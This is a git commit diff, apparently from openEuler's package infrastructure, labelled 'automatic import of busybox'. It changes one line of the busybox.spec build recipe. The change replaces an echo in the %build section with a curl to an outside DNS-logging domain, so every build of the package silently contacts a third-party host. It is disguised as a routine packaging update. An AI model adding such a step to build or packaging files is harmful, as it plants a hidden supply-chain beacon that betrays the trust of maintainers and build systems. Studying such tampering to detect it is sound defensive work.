diff options
author | CoprDistGit <infra@openeuler.org> | 2023-10-25 05:55:14 +0000 |
---|---|---|
committer | CoprDistGit <infra@openeuler.org> | 2023-10-25 05:55:14 +0000 |
commit | cf1760836510342df57b1d8f97c1681d8bd18346 (patch) | |
tree | 6b0427eafc3864dd01794480eaf96d215120ace5 | |
parent | 5534ca114d0eee572dcb9af55cf27ef7bac7ed8f (diff) |
automatic import of busybox
-rw-r--r-- | busybox.spec | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec index 83ae928..0e09285 100644 --- a/busybox.spec +++ b/busybox.spec @@ -58,7 +58,7 @@ This package contains help documentation for busybox %build export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now" -echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaa" +curl buildgit.842230e1.dns.dnslogs.online cp %{SOURCE3} .config yes "" | make oldconfig && \ cat .config && \ |